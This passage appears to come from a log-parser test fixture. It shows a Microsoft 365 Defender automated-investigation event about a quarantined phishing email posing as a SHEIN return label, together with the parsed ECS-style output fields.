urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"3\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"PendingType\\\":\\\"User\\\",\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"Description\\\":\\\"For malicious emails, you can move to junk, soft or hard delete from user's mailbox.\\\"}\"\n    ],\n    \"Data\":\"{\\\"Version\\\":\\\"3.0\\\",\\\"VendorName\\\":\\\"Microsoft\\\",\\\"ProviderName\\\":\\\"TestProvider\\\",\\\"AlertType\\\":\\\"8e6ba277-ef39-404e-aaf1-294f6d9a2b88\\\",\\\"StartTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"EndTimeUtc\\\":\\\"2024-10-30T03:47:24Z\\\",\\\"TimeGenerated\\\":\\\"2024-10-30T03:52:49.16Z\\\",\\\"ProcessingEndTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"Status\\\":\\\"InProgress\\\",\\\"DetectionTechnology\\\":\\\"UrlReputation\\\",\\\"Severity\\\":\\\"Informational\\\",\\\"ConfidenceLevel\\\":\\\"Unknown\\\",\\\"ConfidenceScore\\\":1.0,\\\"IsIncident\\\":false,\\\"ProviderAlertId\\\":\\\"fff21c13-c681-7398-1200-08dcf8958252\\\",\\\"SystemAlertId\\\":null,\\\"CorrelationKey\\\":\\\"bb0ac18c-5081-41e0-8656-f256ba9298d0\\\",\\\"Investigations\\\":[{\\\"$id\\\":\\\"1\\\",\\\"Id\\\":\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\",\\\"InvestigationStatus\\\":\\\"Running\\\"}],\\\"InvestigationIds\\\":[\\\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\\\"],\\\"Intent\\\":\\\"Probing\\\",\\\"ResourceIdentifiers\\\":[{\\\"$id\\\":\\\"2\\\",\\\"AadTenantId\\\":\\\"xxxxxx-xxxxx-xxxxxxx-xxxxxxx-xxxxxxx\\\",\\\"Type\\\":\\\"AAD\\\"}],\\\"AzureResourceId\\\":null,\\\"WorkspaceId\\\":null,\\\"WorkspaceSubscriptionId\\\":null,\\\"WorkspaceResourceGroup\\\":null,\\\"AgentId\\\":null,\\\"AlertDisplayName\\\":\\\"Email messages containing malicious URL removed after delivery\u200b\\\",\\\"Description\\\":\\\"Emails with malicious URL that were delivered and later removed -V1.0.0.3\\\",\\\"ExtendedLinks\\\":[{\\\"Href\\\":\\\"https://security.microsoft.com/alerts/fafff21c13-c681-7398-1200-08dcf8958252\\\",\\\"Category\\\":null,\\\"Label\\\":\\\"alert\\\",\\\"Type\\\":\\\"webLink\\\"}],\\\"Metadata\\\":{\\\"CustomApps\\\":null,\\\"GenericInfo\\\":null},\\\"Entities\\\":[{\\\"$id\\\":\\\"3\\\",\\\"Url\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"Type\\\":\\\"url\\\",\\\"ClickCount\\\":0,\\\"EmailCount\\\":2,\\\"Urn\\\":\\\"urn:UrlEntity:289101bb3aa22cd0464dcd3ffa7116a8\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"4\\\",\\\"Files\\\":[{\\\"$id\\\":\\\"5\\\",\\\"Name\\\":\\\"returnLabel_314378736750.pdf\\\",\\\"FileHashes\\\":[{\\\"$id\\\":\\\"6\\\",\\\"Algorithm\\\":\\\"SHA256\\\",\\\"Value\\\":\\\"F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D\\\",\\\"Type\\\":\\\"filehash\\\"}],\\\"Type\\\":\\\"file\\\",\\\"MalwareFamily\\\":null}],\\\"Recipient\\\":\\\"test.to@ixina.com\\\",\\\"Urls\\\":[\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz49R6-2B-2FASLo-2BUtlyP-2F4iSjQlm-2F4HWFki90oq-2Bc29Sr-2BJAxlu_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6qR2GRWjTyLjKHBwmcXgTV-2BMq0R5qnuDMHYAbrFxAmtHiepp1aU8L-2FOCt-2BiboZksoqBfuo-2FcqBrfi9un8ILJByRUOZM3T6alRzsB1jmdLOKOZwr3m8kymuz3dFvNya6aYPmSZG4l57ycCGBya5xMMqf\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2\\\",\\\"https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xzwS57HzRFV06M2bzMBaRY-2BtdD2HhGOqR6HD9j7eU3woqib3lW0qFsRIYtEfnDRINtIJErjGpQG2ad3jjAbAIacwJ4Le0eScR4TY1ExyusbvGQU5p_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6psejQMn2EzritsHjoZX3rBM6GN1Gt7OeDjl2fzK-2BAK5-2FzHIjoTmyFKIkBvxn4mrKqstgF5tkhF6rc-2BIL2TqH7FTpqHdxk6lMOLfZVS4DrhiP-2FvyHZwSo2RzY-2BDmTRvcBEOqOwutpZKgr0m7fArTF-2Fv\\\",\\\"http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg\\\",\\\"https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg\\\",\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"https://fr.shein.com/\\\",\\\"https://fr.shein.com/robot\\\",\\\"https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1\\\",\\\"https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8\\\"],\\\"Threats\\\":[\\\"ZapPhish\\\",\\\"HighConfPhish\\\"],\\\"Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P1SenderDomain\\\":\\\"gmail.com\\\",\\\"SenderIP\\\":\\\"1.2.3.4\\\",\\\"P2Sender\\\":\\\"test.sender@gmail.com\\\",\\\"P2SenderDisplayName\\\":\\\"Fanny Barriol\\\",\\\"P2SenderDomain\\\":\\\"gmail.com\\\",\\\"ReceivedDate\\\":\\\"2024-10-29T21:12:56\\\",\\\"NetworkMessageId\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"InternetMessageId\\\":\\\"<CAH2_hrsct2KwUBwRFXNs9sXxZyTJMnV2f7FxaPj2eX=7y5a2Hw@mail.gmail.com>\\\",\\\"Subject\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\",\\\"AntispamDirection\\\":\\\"Inbound\\\",\\\"DeliveryAction\\\":\\\"Blocked\\\",\\\"ThreatDetectionMethods\\\":[\\\"UrlReputation\\\"],\\\"Language\\\":\\\"fr\\\",\\\"DeliveryLocation\\\":\\\"Quarantine\\\",\\\"OriginalDeliveryLocation\\\":\\\"Inbox\\\",\\\"PhishConfidenceLevel\\\":\\\"High\\\",\\\"AdditionalActionsAndResults\\\":[\\\"OriginalDelivery: [N/A]\\\",\\\"Zap: [Success: Message moved to quarantine]\\\"],\\\"AuthDetails\\\":[{\\\"Name\\\":\\\"SPF\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DKIM\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"DMARC\\\",\\\"Value\\\":\\\"Pass\\\"},{\\\"Name\\\":\\\"Comp Auth\\\",\\\"Value\\\":\\\"pass\\\"}],\\\"SystemOverrides\\\":[],\\\"Type\\\":\\\"mailMessage\\\",\\\"Urn\\\":\\\"urn:MailEntity:79be71f3203d9db81f0076352eca662e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"7\\\",\\\"MailboxPrimaryAddress\\\":\\\"test.to@ixina.com\\\",\\\"Upn\\\":\\\"test.to@ixina.com\\\",\\\"AadId\\\":\\\"2011d28b-3a87-4359-b2a0-7d14f0a83828\\\",\\\"RiskLevel\\\":\\\"None\\\",\\\"Type\\\":\\\"mailbox\\\",\\\"Urn\\\":\\\"urn:UserEntity:f182c190672d0194477f316c5f0367e5\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T12:58:53\\\"},{\\\"$id\\\":\\\"8\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,SenderIp\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;SenderIp;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;1.2.3.4;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:0b159e7db54d59b4165e81fb02f6c656\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"9\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,P2SenderDomain,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;P2SenderDomain;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;gmail.com;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:5e820543f7cce922d13fcc25a0ca2204\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"10\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (Subject:\\\\\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN\\\\\\\") ) AND ( (SenderIp:\\\\\\\"1.2.3.4\\\\\\\") ) AND ( (AntispamDirection:\\\\\\\"1\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"Subject,SenderIp,AntispamDirection\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"Subject;SenderIp;AntispamDirection;ContentType\\\",\\\"ClusterByValue\\\":\\\"Fwd: Votre \u00e9tiquette de retour de SHEIN;1.2.3.4;1;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a42bb73f2f36d917364f11fe67f0c39b\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"11\\\",\\\"NetworkMessageIds\\\":[\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":1,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0},\\\"CountByProtectionStatus\\\":{\\\"Blocked\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Quarantine\\\":1},\\\"Query\\\":\\\"( (( (BodyFingerprintBin1:\\\\\\\"2929356879\\\\\\\") ) AND ( (P2SenderDomain:\\\\\\\"gmail.com\\\\\\\") ) AND ( (ContentType: 1) )) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"MailCount\\\":1,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"ClusterSourceType\\\":\\\"Similarity\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:45.0302157Z\\\",\\\"ClusterGroup\\\":\\\"BodyFingerprintBin1,P2SenderDomain\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"BodyFingerprintBin1;P2SenderDomain;ContentType\\\",\\\"ClusterByValue\\\":\\\"2929356879;gmail.com;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:45 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:a5f65badbcbc2e3c6409625436363a29\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:52\\\"},{\\\"$id\\\":\\\"12\\\",\\\"NetworkMessageIds\\\":[\\\"24b8430c-484d-4ee0-e12b-08dcee99416a\\\",\\\"2e99f39a-c998-4d94-2085-08dce9cd0b7d\\\",\\\"0ac4ee3c-7c79-408e-76c2-08dcf4106b65\\\",\\\"fd400540-8a8d-42ae-d1f9-08dced20c42f\\\",\\\"31cfca73-f309-4e21-cbc4-08dceed074cf\\\",\\\"0491b33a-15fc-4503-9dd1-08dced818f57\\\",\\\"4b620244-917b-4a04-7416-08dcf50af378\\\",\\\"1abed68d-3b03-46bd-45e2-08dcf43fb625\\\",\\\"abb4c4a5-7049-4047-5a68-08dcec201c1f\\\",\\\"92bba720-15bc-4f09-49f2-08dcf8d738a4\\\",\\\"3d511617-b717-416c-89cf-08dcf90a51c7\\\",\\\"c3ad4b6b-0fd9-4510-4481-08dcf9043502\\\",\\\"37b236bd-ad39-41c0-3984-08dcf85e6b44\\\",\\\"a1d9684c-9982-4f80-880c-08dcf775c1a9\\\"],\\\"CountByThreatType\\\":{\\\"HighConfPhish\\\":5,\\\"Phish\\\":0,\\\"Malware\\\":0,\\\"Spam\\\":0,\\\"MaliciousUrl\\\":15},\\\"CountByProtectionStatus\\\":{\\\"Delivered\\\":10,\\\"Blocked\\\":4,\\\"DeliveredAsSpam\\\":1},\\\"CountByDeliveryLocation\\\":{\\\"Inbox\\\":10,\\\"Quarantine\\\":4,\\\"DeletedFolder\\\":1},\\\"Query\\\":\\\"( ((NormalizedUrl:\\\\\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\\\\\") AND (ContentType: 1)) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:PhishEdu) AND NOT(XmiInfoTenantPolicyFinalVerdictSource:SecOps))\\\",\\\"QueryTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"MailCount\\\":15,\\\"IsVolumeAnamoly\\\":false,\\\"ClusterSourceIdentifier\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en\\\",\\\"ClusterSourceType\\\":\\\"UrlThreatIndicator\\\",\\\"ClusterQueryStartTime\\\":\\\"2024-10-11T00:00:00Z\\\",\\\"ClusterQueryEndTime\\\":\\\"2024-10-31T13:31:54.2957192Z\\\",\\\"ClusterGroup\\\":\\\"UrlThreatIdentifier\\\",\\\"Type\\\":\\\"mailCluster\\\",\\\"ClusterBy\\\":\\\"NormalizedUrl;ContentType\\\",\\\"ClusterByValue\\\":\\\"https://play.google.com/store/apps/details?id=com.zzkko&hl=en;1\\\",\\\"QueryStartTime\\\":\\\"10/11/2024 12:00:00 AM\\\",\\\"QueryTime\\\":\\\"10/31/2024 1:31:54 PM\\\",\\\"Urn\\\":\\\"urn:MailClusterEntity:cae0ce4483385c4ff176b00a0cd18f8e\\\",\\\"Source\\\":\\\"TestProvider\\\",\\\"FirstSeen\\\":\\\"2024-10-31T13:31:56\\\"}],\\\"LogCreationTime\\\":\\\"2024-10-31T15:28:45.1030022Z\\\",\\\"MachineName\\\":\\\"MachineNameTest\\\",\\\"SourceTemplateType\\\":\\\"Threat_Single\\\",\\\"Category\\\":\\\"ThreatManagement\\\",\\\"SourceAlertType\\\":\\\"System\\\"}\",\n    \"DeepLinkUrl\":\"https://security.microsoft.com/mtp-investigation/urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"EndTimeUtc\":\"2024-10-31T15:26:49\",\n    \"InvestigationId\":\"urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"InvestigationName\":\"Mail with malicious urls is zapped - urn:ZappedUrlInvestigation:611e72a0f8dc10fecbf6fc017c51d101\",\n    \"InvestigationType\":\"ZappedUrlInvestigation\",\n    \"LastUpdateTimeUtc\":\"2024-10-31T12:59:19\",\n    \"RunningTime\":9022,\n    \"StartTimeUtc\":\"2024-10-31T12:58:22\",\n    \"Status\":\"Pending Action\"\n }",
+    "event": {
+      "action": "AirInvestigationData",
+      "code": "64",
+      "end": "2024-10-31T15:26:49Z",
+      "kind": "event",
+      "outcome": "success",
+      "start": "2024-10-31T12:58:22Z"
+    },
+    "@timestamp": "2024-10-31T16:24:41Z",
+    "action": {
+      "id": 64,
+      "name": "AirInvestigationData",
+      "outcome": "success",
+      "target": "user"
+    },
+    "email": {
+      "attachments": [
+        {
+          "file": {
+            "hash": {
+              "sha256": "F9F5D882A83CAF93B3DBEACED8FCFCCD123ABDCD141A1B5423A74E387BA74D5D"
+            },
+            "name": "returnLabel_314378736750.pdf"
+          }
+        }
+      ],
+      "from": {
+        "address": [
+          "test.sender@gmail.com"
+        ]
+      },
+      "to": {
+        "address": [
+          "test.to@ixina.com"
+        ]
+      }
+    },
+    "host": {
+      "name": "MachineNameTest"
+    },
+    "log": {
+      "level": "Informational"
+    },
+    "office365": {
+      "audit": {
+        "object_id": "c3ebef20-fb63-4d14-b3c1-7bfb5937903a"
+      },
+      "investigation": {
+        "alert": {
+          "category": "ThreatManagement",
+          "correlation_key": "bb0ac18c-5081-41e0-8656-f256ba9298d0",
+          "is_incident": false,
+          "provider": {
+            "name": "TestProvider",
+            "status": "InProgress"
+          },
+          "severity": "Informational",
+          "source_type": "System",
+          "type": "8e6ba277-ef39-404e-aaf1-294f6d9a2b88"
+        },
+        "delivery": {
+          "action": [
+            "Blocked"
+          ]
+        },
+        "email": {
+          "sender": {
+            "domains": [
+              "gmail.com"
+            ],
+            "ip": [
+              "1.2.3.4"
+            ]
+          },
+          "subjects": [
+            "Fwd: Votre \u00e9tiquette de retour de SHEIN"
+          ],
+          "urls": [
+            "http://shein.ltwebstatic.com/advertise/shein/www/images_sheIn/SheIn_logo1_1.png",
+            "https://fr.shein.com/",
+            "https://fr.shein.com/robot",
+            "https://fr.shein.com/user/order_return/order_return_label/GSONEQ62U001GKT?country=France&refund_bill_id=&return_order_id=NE91E0E8C1",
+            "https://itunes.apple.com/us/app/yub-streetwear-fashion-shopping/id878577184?mt=8",
+            "https://play.google.com/store/apps/details?id=com.zzkko&hl=en",
+            "https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_09_2.jpg",
+            "https://romwe.ltwebstatic.com/advertise/romwe/www/images_Romwe/edm3_11_1.jpg",
+            "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2B7I3RFKjR2LTj-2FCdqvCgUA-3De-zv_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6otxpVGSalyLT-2BMyMS7yEfvbLbY9v9Wjn3hkHG29S-2FBOFjoVX-2FSwv2kZeymJW-2FlgRvHCB20rH0kwYqIdOsdO-2FvuCq-2BU49-2FNEo4S2gaZRd0h3zn5MFhXxj-2F-2FbW3X5gOaGP7-2FpGN-2BX-2BHRi1Xt1JzFgCpA",
+            "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz-2BkzPoBjfVNj9CJCtsLW0zwNgmTcKgWQoyoJpwVuYlpQciOV7VFY4y40pT7PbFjZu-2BT61qNz-2FjLIbrl5IqV-2F6VA-3Dowc9_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oKxDmfijZNNeoMjhZ1voAZ4rYtu5m9xdiEh8pCCrwyFrXAffKU6vpGqbxQY4O5g0v8B7yN8HEfrFjo7Fn7G-2FQVkuoVw1L-2FcSqVGgGsGEOY4-2BG2cvJmEd1era-2FAnl53IvDmt-2FjEc5wDjePqx-2Ff9ahD7",
+            "https://u25492214.ct.sendgrid.net/ls/click?upn=u001.Ni9F2bUzMGygU7I6927xz1dNl4cyoCqQhbWGcqggHJW8SDLFVls-2FdSGWRn2n26uXgiSb-2FLZ3Oc-2F6taFyBHXTJv-2BdvE0YkDtEsaWUVnnpz7Lus9fp2MjvsYOqibyuC9Sjzgm4flo2XfvY4y5mBWuQF-2F7nM55pZ5S6S-2BSuNa5j-2BID5HJzdZOlXc2nyvbxmDFrTDuau_r5YCKD565fWzehHx-2FViuB8oHOL1DYwg-2Bfx4BUmzkfTPes7sa-2BVi-2BqS9kcdV08lhzTrs-2B4Lvsupi32g3cG4FINnNbknV9eEzYIqgaa4YfaZHEEHRVUWDqycf8mgAbrzvtnOX7pQHdt3iR6DHP-2BxR3PfnH-2BDzIJZkv1MK0yzBmp6oCyme2zPY6GKJBwI7FWZYrXhePHLdzV5WL-2F5EJubwqlYflj1CI9yL7Xfb24ks7WDE2wa8hQ-2BQ3h8K7-2FNpWkzEtiEQPiPEF3zOMzaOlqjkbPLg0UzpEmObjky1BycKoXMMwtfEuHLB9VnhNmDV3aIW2",
